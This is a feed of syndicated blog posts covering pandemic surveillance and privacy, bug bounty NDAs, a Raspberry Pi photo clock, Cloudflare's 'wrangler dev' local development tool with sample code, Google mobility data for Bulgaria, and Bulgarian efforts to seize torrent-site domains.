Even though I understand how it works, I consistently find Google’s ability to know how long it will take me to drive somewhere nothing less than magical. GPS signals stream location and speed data from the legion of smartphones in vehicles on the roads between my origin and my destination; it takes only a bit of math to come up with an estimate accurate to within a few minutes.

Lately, researchers have noted that this same data can be used to pinpoint serious traffic accidents minutes before any calls get placed to emergency responders—extra time within that “golden hour” vital to the saving of lives. That result points to a hidden upside to the beast Shoshana Zuboff termed surveillance capitalism. That is, all of this data about our activities being harvested by our devices could be put to work to serve the public good.

We need that now like never before, as the entire planet confronts a pandemic. Fortunately, we’ve been exceptionally clever at making smartphones—more than 4 billion of them in every nation on earth—and they offer an unprecedented opportunity to harness their distributed sensing and intelligence to provide a greater degree of safety than we might have had without them.

Taiwan got into this game early, combining the lessons of SARS with the latest in tracking and smartphone apps to deliver an integrated public health response. As of this writing, that approach has kept the country’s infection rate among the lowest in the world. The twin heads of surveillance capitalism, Google and Facebook, will spend the next year working with public health authorities to provide insights that can guide both the behavior of individuals and public policy. That’s going to give some angina to the advocates of strong privacy policies (I count myself among them), but in an emergency, public good inevitably trumps private rights.

This relaxation of privacy boundaries mustn’t mean the imposition of a surveillance state—that would only result in decreased compliance. Instead, our devices will be doing our utmost to remind us how to stay healthy, much like our smartwatches already do but more pointedly and with access to far greater data. Both data and access are what we must be most careful with, looking for the sweet spot between public health and private interest, with an eye to how we can wind back to a world with greater privacies after the crisis abates.

A decade ago I quit using Facebook, because even then I had grave suspicions that my social graph could be weaponized and used against me. Yet this same capacity to know so much about people—their connections, their contacts, even their moods—means we also have a powerful tool to track the spread of outbreaks both of disease and deadly misinformation. While firms like Cambridge Analytica have used this power to sway the body politic, we haven’t used such implements yet for the public good. Now, I’d argue, we have little choice.

We technologists are going to need to get our hands dirty, and only with transparency, honesty, and probity can we do so safely. Yes, use the data, use the tools, use the analytics and the machine learning, bring it all to bear. But let us all know how, when, and why it’s being used. Because it appears that making a turn toward a surveillance society will protect us now—and, in particular, help our most vulnerable to stay safe—we need to be honest about our needs, transparent about our uses, and completely clear about our motives.

Bug Bounty Programs Are Being Used to Buy Silence

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/04/bug_bounty_prog.html

Investigative report on how commercial bug-bounty programs like HackerOne, Bugcrowd, and SynAck are being used to silence researchers:

Used properly, bug bounty platforms connect security researchers with organizations wanting extra scrutiny. In exchange for reporting a security flaw, the researcher receives payment (a bounty) as a thank you for doing the right thing. However, CSO’s investigation shows that the bug bounty platforms have turned bug reporting and disclosure on its head, what multiple expert sources, including HackerOne’s former chief policy officer, Katie Moussouris, call a “perversion.”

[…]

Silence is the commodity the market appears to be demanding, and the bug bounty platforms have pivoted to sell what willing buyers want to pay for.

“Bug bounties are best when transparent and open. The more you try to close them down and place NDAs on them, the less effective they are, the more they become about marketing rather than security,” Robert Graham of Errata Security tells CSO.

Leitschuh, the Zoom bug finder, agrees. “This is part of the problem with the bug bounty platforms as they are right now. They aren’t holding companies to a 90-day disclosure deadline,” he says. “A lot of these programs are structured on this idea of non-disclosure. What I end up feeling like is that they are trying to buy researcher silence.”

The bug bounty platforms’ NDAs prohibit even mentioning the existence of a private bug bounty. Tweeting something like “Company X has a private bounty program over at Bugcrowd” would be enough to get a hacker kicked off their platform.

The carrot for researcher silence is the money — bounties can range from a few hundred to tens of thousands of dollars — but the stick to enforce silence is “safe harbor,” an organization’s public promise not to sue or criminally prosecute a security researcher attempting to report a bug in good faith.

Instaclock | The Magpi 92

Post Syndicated from Ashley Whittaker original https://www.raspberrypi.org/blog/instaclock-the-magpi-92/

Designed to celebrate a new home, Instaclock uses two Raspberry Pi computers to great visual effect. Rosie Hattersley introduces maker Riccardo Cereser’s eye-catching build in issue #92 of The MagPi, out now.

There is nothing like a deadline to focus the mind! Copenhagen-based illustrator and UX designer Riccardo Cereser was about to move into a new apartment with his girlfriend, and was determined his new home would have a unique timepiece. Instaclock is the result.

Having studied at the Copenhagen Institute of Interactive Design, Italian-born Riccardo was keen that his new apartment would include an object that reflected his skills. He began sketching out ideas in Photoshop, starting with the idea of images representing numbers. “A hand showing fingers; a bicycle wheel resembling the number 0; candles on a cake; or the countdown numbers that appear in the beginning of a recording…” he suggests.

Having decided the idea could be used for an interactive clock, he quickly worked out how such an image-based concept might work displaying the hour, minutes, and seconds on displays in three wooden boxes.

Next, he set off around Copenhagen. “I started taking photos of anything that could resemble a number, aiming to create sets of ten pictures each based on a specific theme,” he recalls. “I then thought how awesome it would be to be able to switch the theme and create new sets on the go, potentially by using Instagram.”

This, Riccardo explains, is how the project became known as Instaclock. He was able to visualise his plan using Photoshop and made a prototype for his idea. It was clear that there was no need to display seconds, for example. Minute-by-minute updates would be fine.

Getting animated

Next up was figuring out how to call up and refresh the images displayed. Riccardo had some experience of using Raspberry Pi, and had even made a RetroPie games console. He also had a friend on the interactive design course who might just be able to help.

Creative coder Andreas Refsgaard soon got involved, and was quickly able to come up with a Processing sketch for Instaclock.

Having spent dozens of hours looking into how an API might be used to pull in specific images for his clock, Riccardo was grateful that Andreas immediately grasped how it could be done. Riccardo then set parameters in cron for each Raspberry Pi used, so the Instaclock loaded images at startup and moved on to the next image set every ten seconds.

Because Riccardo wanted Instaclock to be as user-friendly as possible, they also added a rule that shuts a screen down if the button on top of it is pressed for ten seconds or more. The script was one he got from The MagPi.

Assembly time

One of the most fun aspects of this project was the opportunity to photograph, draw, or source online images that represent numerals. It was also the most time-consuming, of course. Images reside in Dropbox folders, so can be accessed from anywhere. Deciding on a suitable set of screens to display them, and boxes or frames for them, could also have dragged on but for an impromptu visit to Ikea. Riccardo fortuitously found that the Waveshare screens he selected would fit neatly into the store’s Dragan file organiser boxes. He was then able to laser-cut protective overlays secured with tiny magnets.

Read The MagPi for free!

Find more fantastic projects, tutorials, and reviews in The MagPi #92, out now! You can get The MagPi #92 online at our store, or in print from all good newsagents and supermarkets. You can also access The MagPi magazine via our Android and iOS apps.

Don’t forget our super subscription offers, which include a free gift of a Raspberry Pi Zero W when you subscribe for twelve months.

And, as with all our Raspberry Pi Press publications, you can download the free PDF from our website.


Trailblazing a Development Environment for Workers

Post Syndicated from Avery Harnish original https://blog.cloudflare.com/trailblazing-a-development-environment-for-workers/

When I arrived at Cloudflare for an internship in the summer of 2018, I was taken on a tour, introduced to my mentor who took me out for coffee (shoutout to Preston), and given a quick whiteboard overview of how Cloudflare works. Each of the interns would work on a small project of their own and they’d try to finish them by the end of the summer. The description of the project I was given on my very first day read something along the lines of “implementing signed exchanges in a Cloudflare Worker to fix the AMP URL attribution problem,” which was a lot to take in at once. I asked so many questions those first couple of weeks. What are signed exchanges? Can I put these stickers on my laptop? What’s a Cloudflare Worker? Is there a limit to how much Topo Chico I can take from the fridge? What’s the AMP URL attribution problem? Where’s the bathroom?

I got the answers to all of those questions (and more!) and eventually landed a full-time job at Cloudflare. Here’s the story of my internship and working on the Workers Developer Experience team at Cloudflare.

Getting Started with Workers in 2018

After doing a lot of reading, and asking a lot more questions, it was time to start coding. I set up a Cloudflare account with a Workers subscription, and was greeted with a page that looked something like this:

Trailblazing a Development Environment for Workers

I was able to change the code in the text area on the left, click “Update”, and the changes would be reflected on the right — fairly self-explanatory. There was also a testing tab which allowed me to handcraft HTTP requests with different methods and custom headers. So far so good.

As my project evolved, it became clear that I needed to leave the Workers editor behind. Anything more than a one-off script tends to require JavaScript modules and multiple files. I spent some time setting up a local development environment for myself with npm and webpack (see, purgatory: a place or state of temporary suffering. merriam-webster.com).

After I finally got everything working, my iteration cycle looked a bit like this:

  1. Make a change to my code
  2. Run npm run build (which ran webpack and bundled my code in a single script)
  3. Open ./dist/worker.min.js (the output from my build step)
  4. Copy the entire contents of the built Worker to my clipboard
  5. Switch to the Cloudflare Workers Dashboard
  6. Paste my script into the Workers editor
  7. Click update
  8. Investigate the behavior of my recently modified script
  9. Rinse and repeat

There were two main things here that were decidedly not a fantastic developer experience:

  1. Inspecting the value of a variable by adding a console.log statement would take me ~2-3 minutes and involved lots of manual steps to perform a full rebuild.
  2. I was unable to use familiar HTTP clients such as cURL and Postman without deploying to production. This was because the Workers Preview UI was an iframe nested in the dashboard.

Luckily for me, Cloudflare Workers deploy globally incredibly quickly, so I could push the latest iteration of my Worker, wait just a few seconds for it to go live, and cURL away.

A Better Workers Developer Experience in 2019

Shortly after we shipped AMP Real URL, Cloudflare released Wrangler, the official CLI tool for developing Workers, and I was hired full time to work on it. Wrangler came with a feature that automated steps 2-7 of my workflow by running the command wrangler preview, which was a significant improvement. Running the command would build my Worker and open the browser automatically for me so I could see log messages and test out HTTP requests. That summer, our intern Matt Alonso created wrangler preview --watch. This command automatically updates the Workers preview window when changes are made to your code. You can read more about that here. This was, yet again, another improvement over my old friend Build and Open and Copy and Switch Windows and Paste Forever and Ever, Amen. But there was still no way that I could test my Worker with any HTTP client I wanted without deploying to production — I was still locked in to using the nested iframe.

A few months ago we decided it was time to do something about it. To the whiteboard!

Enter wrangler dev

Most web developers are familiar with developing their applications on localhost, and since Wrangler is written in Rust, it means we could start up a server on localhost that would handle requests to a Worker. The idea was to somehow start a server on localhost and then transform incoming requests and send them off to a preview session running on a Cloudflare server.

Proof of Concept

What we came up with ended up looking a little something like this — when a developer runs wrangler dev, do the following:

Trailblazing a Development Environment for Workers

  1. Build the Worker
  2. Upload the Worker via the Cloudflare API as a previewable Worker
  3. The Cloudflare API takes the uploaded script and creates a preview session, and returns an access token
  4. Start listening for incoming HTTP requests at localhost:8787

Top secret fact: 8787 spells out Rust on a phone numpad. Happy Easter!

  5. All incoming requests to localhost:8787 are modified:

  • All headers are prepended with cf-ew-raw- (for instance, X-Auth-Header would become cf-ew-raw-X-Auth-Header)
  • The URL is changed to https://rawhttp.cloudflareworkers.com/${path}
  • The Host header is changed to rawhttp.cloudflareworkers.com
  • The cf-ew-preview header is added with the access token returned from the API in step 3

  6. After sending this request, the response is modified:

  • All headers not prefixed with cf-ew-raw- are discarded and headers with the prefix have it removed (for instance, cf-ew-raw-X-Auth-Success would become X-Auth-Success)

The hard part here was already done — the Workers Core team had already implemented the API to support the Preview UI. We just needed to gently nudge Wrangler and the API to be the best of friends. After some investigation into Rust’s HTTP ecosystem, we settled on using the HTTP library hyper, which I highly recommend if you’re in need of a low level HTTP library — it’s fast, correct, and the ergonomics are constantly improving. After a bit of work, we got a prototype working and carved Wrangler ❤️ Cloudflare API into the old oak tree down by Lady Bird Lake.
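As an added example (not Wrangler's own code), here is the request and response rewriting from the two modification steps above, written in plain Rust with std types only in place of hyper. The preview token and the sample headers are constructed, and comparing header names case-insensitively is an assumption about the real proxy.

```rust
// Added example (not Wrangler's own code): the request/response rewriting
// that `wrangler dev` performs, modelled on plain std types instead of hyper.
// Header names are treated case-insensitively, as HTTP requires (an
// assumption about how the real proxy compares them).

const PREVIEW_HOST: &str = "rawhttp.cloudflareworkers.com";
const RAW_PREFIX: &str = "cf-ew-raw-";
const PREVIEW_TOKEN_HEADER: &str = "cf-ew-preview";

/// A header list in arrival order; duplicates are allowed, as in HTTP.
pub type Headers = Vec<(String, String)>;

/// Extract the path-and-query component from an absolute URL such as
/// `http://127.0.0.1:8787/api/items?id=7`, defaulting to `/`.
pub fn path_and_query(url: &str) -> String {
    let after_scheme = match url.find("://") {
        Some(i) => &url[i + 3..],
        None => url,
    };
    match after_scheme.find('/') {
        Some(i) => after_scheme[i..].to_string(),
        None => "/".to_string(),
    }
}

/// Request step: turn a request received on localhost:8787 into the request
/// forwarded to the preview service. Returns the new URL and header list.
pub fn rewrite_request(local_url: &str, headers: &Headers, token: &str) -> (String, Headers) {
    let mut out: Headers = headers
        .iter()
        // Every client header is namespaced, so a local client can never
        // supply a bare `Host` or `cf-ew-preview` that the preview service
        // would trust; only the values set below reach it unprefixed.
        .map(|(name, value)| (format!("{}{}", RAW_PREFIX, name), value.clone()))
        .collect();
    out.push(("Host".to_string(), PREVIEW_HOST.to_string()));
    out.push((PREVIEW_TOKEN_HEADER.to_string(), token.to_string()));
    let url = format!("https://{}{}", PREVIEW_HOST, path_and_query(local_url));
    (url, out)
}

/// Response step: keep only `cf-ew-raw-*` headers and strip the prefix;
/// anything else belongs to the preview service, not to the Worker.
pub fn unwrap_response(headers: &Headers) -> Headers {
    headers
        .iter()
        .filter_map(|(name, value)| {
            let lower = name.to_ascii_lowercase();
            if lower.starts_with(RAW_PREFIX) {
                // ASCII lowercasing preserves byte length, so slicing the
                // original name at the prefix length is safe.
                Some((name[RAW_PREFIX.len()..].to_string(), value.clone()))
            } else {
                None
            }
        })
        .collect()
}

fn main() {
    // Constructed sample: what curl sends to the local dev server.
    let incoming: Headers = vec![
        ("Host".to_string(), "localhost:8787".to_string()),
        ("X-Auth-Header".to_string(), "abc123".to_string()),
        ("cf-ew-preview".to_string(), "spoofed".to_string()),
    ];
    let (url, forwarded) = rewrite_request(
        "http://localhost:8787/api/items?id=7",
        &incoming,
        "PREVIEW-TOKEN-PLACEHOLDER", // placeholder, not a real token
    );
    println!("forward to {}", url);
    for (k, v) in &forwarded {
        println!("  {}: {}", k, v);
    }

    // Constructed sample: what the preview service answers.
    let upstream: Headers = vec![
        ("cf-ew-raw-X-Auth-Success".to_string(), "true".to_string()),
        ("CF-EW-RAW-Content-Type".to_string(), "text/plain".to_string()),
        ("cf-ray".to_string(), "internal".to_string()),
    ];
    println!("to client: {:?}", unwrap_response(&upstream));
}
```

The `main` shows a client-supplied `cf-ew-preview` header being namespaced away rather than overriding the real token, which is the property the prefixing scheme buys.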

Usage

Let’s say I have a Workers script that looks like this:

addEventListener('fetch', event => {
  event.respondWith(handleRequest(event.request))
})

async function handleRequest(request) {
  let message = "Hello, World!"
  return new Response(message)
}

If I created a Wrangler project with this code and ran wrangler dev, this is what it looked like:

$ wrangler dev
👂  Listening on http://127.0.0.1:8787

In another terminal session, I could run the following:

$ curl localhost:8787
Hello, World!

It worked! Hooray!

Just the Right Amount of Scope Creep

At this point, our initial goal was complete: any HTTP client could test out a Worker before it was deployed. However, wrangler dev was still missing crucial functionality. When running wrangler preview, it’s possible to view console.log output in the browser editor. This is incredibly useful for debugging Workers applications, and something with a name like wrangler dev should include a way to view those logs as well. “This will be easy,” I said, not yet knowing what I was signing up for. Buckle up!

console.log, V8, and the Chrome Devtools Protocol, Oh My!

My first goal was to get a Hello, World! message streamed to my terminal session so that developers can debug their applications using wrangler dev. Let’s take the script from earlier and add a console.log statement to it:

addEventListener('fetch', event => {
  event.respondWith(handleRequest(event.request))
})

async function handleRequest(request) {
  let message = "Hello, World!"
  console.log(message) // this line is new
  return new Response(message)
}

If you’d like to follow along, you can paste that script into the editor at cloudflareworkers.com using Google Chrome.

This is what the Preview editor looks like when that script is run:

Trailblazing a Development Environment for Workers

You can see that Hello, World! has been printed to the console. This may not be the most useful example, but in more complex applications logging different variables is helpful for debugging. If you’re following along, try changing console.log(message) to something more interesting, like console.log(request.url).

The console may look familiar to you if you’re a web developer because it’s the same interface you see when you open the Developer Tools in Google Chrome. Since Cloudflare Workers is built on top of V8 (more info about that here and here), the Workers runtime is able to create a WebSocket that speaks the Chrome Devtools Protocol. This protocol allows the client (your browser, Wrangler, or anything else that supports WebSockets) to send and receive messages that contain information about the script that is running.

In order to see the messages that are being sent back and forth between our browser and the Workers runtime:

  1. Open Chrome Devtools
  2. Click the Network tab at the top of the inspector
  3. Click the filter icon underneath the Network tab (it looks like a funnel and is nested between the cancel icon and the search icon)
  4. Click WS to filter out all requests but WebSocket connections

Your inspector should look like this:

Trailblazing a Development Environment for Workers

Then, reload the page, and select the /inspect item to view its messages. It should look like this:

Trailblazing a Development Environment for Workers

Hey look at that! We can see messages that our browser sent to the Workers runtime to enable different portions of the developer tools for this Worker, and we can see that the runtime sent back our Hello, World! Pretty cool!

On the Wrangler side of things, all we had to do to get started was initialize a WebSocket connection for the current Worker, and send a message with the method Runtime.enable so the Workers runtime would enable the Runtime domain and start sending console.log messages from our script.

After those initial steps, it quickly became clear that a lot more work was needed to get to a useful developer tool. There’s a lot that goes into the Chrome Devtools Inspector and most of the libraries for interacting with it are written in languages other than Rust (which we use for Wrangler). We spent a lot of time switching WebSocket libraries due to incompatibilities across operating systems (turns out TLS is hard) and implementing the part of the Chrome Devtools Protocol in Rust that we needed to. There’s a lot of work that still needs to be done in order to make wrangler dev a top notch developer tool, but we wanted to get it into the hands of developers as quickly as possible.

Try it Out!

wrangler dev is currently in alpha, and we’d love it if you could try it out! You should first check out the Quick Start and then move on to wrangler dev. If you run into issues or have any feedback, please let us know!

Signing Off

I’ve come a long way from where I started in 2018 and so has the Workers ecosystem. It’s been awesome helping to improve the developer experience of Workers for future interns, internal Cloudflare teams, and of course our customers. I can’t wait to see what we do next. I have some ideas for what’s next with Wrangler, so stay posted!

P.S. Wrangler is also open source, and we are more than happy to field bug reports, feedback, and community PRs. Check out our Contribution Guide if you want to help out!

According to Google mobility data: Bulgarians are the most mobile in the Balkans under strict restrictions

Post Syndicated from Атанас Чобанов original https://bivol.bg/bulgaria-balkans-google-mobility.html

Friday, 3 April 2020


Amid the heavy restrictions imposed because of the COVID-19 pandemic, the mobility of Bulgarian citizens has decreased the least compared with the neighbouring countries, according to data released by Google.

The data come from the geolocation of mobile devices and are anonymised. They cover the period from 16 February to 29 March and have been made public so that governments can inform themselves about the real state of compliance with the quarantine measures, the global internet giant says.

Mobility in Bulgaria according to Google's data as of 29 March.

Mobility is divided into three categories: Retail & recreation, i.e. visits to shopping centres, cafés, restaurants, museums, cinemas and attractions; Grocery & pharmacy, i.e. visits to grocery stores, markets and pharmacies; and Parks, i.e. visits to parks, gardens and beaches. The data are summarised as the percentage change in visits compared with the period before the restrictive measures.

Bulgarians' discipline in the "Recreation" and "Shopping" categories is the worst in the Balkans, and in the "Parks" category it is better only than that of Bosnia and Herzegovina, according to Bivol's comparison of the data for the different countries. This conclusion is provisional, since no data are available for Albania and Serbia at this time.

Retail & recreation

Grocery & pharmacy

Parks

In fact, Bulgaria is much closer to the Netherlands, where the restriction regime is more liberal. In the Balkans, Romania is the champion in all three categories. Unsurprisingly, in Europe the ranking for reduced mobility is led by Italy and Spain, the hardest-hit countries.

One interpretation of these data is that the strict social and physical distancing measures in Bulgaria are not being observed. Bulgarian members of parliament also demonstrated low discipline in this respect two days ago, when they queued for COVID-19 testing at two hospitals in the capital. The photos circulated in the media show that they are not keeping the prescribed distance of one and a half metres.

Photo: Димитър Кьосермарлиев, Bulgaria ON AIR

Bulgaria Plans to Take Down Top Torrent Sites, with U.S. Assistance

Post Syndicated from Ernesto original https://torrentfreak.com/bulgaria-plans-to-take-down-top-torrent-sites-with-u-s-assistance-200403/

Last year, Bulgarian authorities carried out several sting operations to take down key players in the IPTV piracy ecosystem. It also provided key assistance in the police action against Xtream Codes.

The country’s increased efforts to protect copyright holders haven’t gone unnoticed in the United States. The U.S. Trade Representative (USTR) previously removed Bulgaria from their ‘Special 301 Watch List’ and the country hopes to keep it that way.

This week, TorrentFreak obtained a transcript from the most recent hearing on the 2020 Special 301 review. The Government of Bulgaria also sent a representative to the meeting, Ivo Konstantinov, who informed the USTR about the country’s continued progress.

In addition to mentioning IPTV sting operations and legislative developments, Konstantinov stressed that more work has to be done. Specifically, Bulgaria is working on shutting down several major torrent sites with help from U.S. law enforcement.

“Most important of all, the elephant in our room are two of the largest torrent tracking servers that are operating in our country, whose servers are outside of the country,” Bulgaria’s representative said.

“[O]ur National Police and Combat Organized Crime Unit is preparing requests for legal assistance from the U.S. side to deface them and take them down from their host services, which are here in the United States.”

Konstantinov informed the USTR that “this is coming.” No concrete dates were given but the authorities are also working on indictments, which suggests that criminal prosecutions may follow as well.

During the hearing, no websites were mentioned. However, we managed to track down several USTR filings from earlier this year which identify the two trackers as Zamunda.net and ArenaBG. Both sites are among the top 25 most-visited websites in Bulgaria.

In one document the Bulgarian Government states that it intends to “terminate the activities of the Zamunda and Arena.bg torrent trackers,” adding that “5 pre-trial proceedings were opened” for “intellectual property and tax crimes.”

Bulgaria states that U.S. assistance is required as the sites in question use American services. This includes their domain names. Zamunda currently has a .net domain and ArenaBG operates from a .com domain, for example. Both are maintained by Verisign, which is based in the US.

The domains can also be targeted by going to ICANN, which oversees the entire domain name ecosystem. This route is also covered, as the Bulgarian Prosecutor’s Office and the Organized Crime Unit will request ICANN to withdraw the associated domain names.

Yet more pieces of the puzzle fell into place when we stumbled upon another document the Bulgarian Government sent to the USTR. This shows that the U.S. Department of Justice is already actively involved and that more sites are being targeted.

The document references a business trip Bulgarian representatives made to the US last October. These officials met with US law enforcement and businesses, discussing potential anti-piracy actions.

These actions include domain seizures relating to four websites. The aforementioned Zamunda.net and ArenaBG.com, but also Zelka.org and RarBG.to. The latter is a major target, as it’s one of the most-used torrent sites worldwide.

During the trip, Matthew Lamberti from the US Department of Justice agreed to help, under the mutual legal assistance treaty, to seize the associated domain names.

“During the meeting with Mat Lamberti an agreement was reached that an MLAT will be sent by our country, regarding initiated pre-trials concerning four torrent trackers – with the aim of seizing domains, registered in the USA,” the document reads.

If all goes well, Bulgaria will also enlist assistance from other countries to seize any other associated domain names, including mirrors.

“If the planned procedure is successful and the domains are seized, our country intends to send the MPP to the other countries where the mirror domains of the above are registered.”

Bulgaria also mentioned that Cloudflare, a US-based company, is used by most of the top torrent sites in the world. The sites use the CDN provider to “conceal the actual location” of these “criminalized Internet resources.”

During the USTR meeting in Washington, Konstantinov mentioned that Cloudflare is cooperative as it helps to identify the sites’ true hosting locations. It’s now up to Bulgaria and the US to get the paperwork sorted, so domain names and possibly servers can be seized and shut down, he added.

The documents are remarkable, as they lay out in detail how Bulgaria and the US are working together to try and take down several top torrent sites. All the quotes and references, while not easy to find, have been made public by the USTR itself.

In some instances, the paperwork refers to ‘Arena.bg’ and ‘Rar.bg’ instead of ArenaBG.com and RarBG.to. While that’s confusing, the latter two are the largest sites by far and likely the main targets.

Finally, it’s interesting to note that, in this case, Bulgaria needs assistance from the US to shut down popular pirate sites, especially considering that the US frequently points to a lack of enforcement action in other countries.

All in all, we can say that the documents clearly lay out the playbook to target the four torrent sites, but thus far, all targets are still operating as usual.

The transcript from the USTR hearing is available here (pdf) and the additional documents that were sent to the USTR can be found here (pdf) and here (pdf).
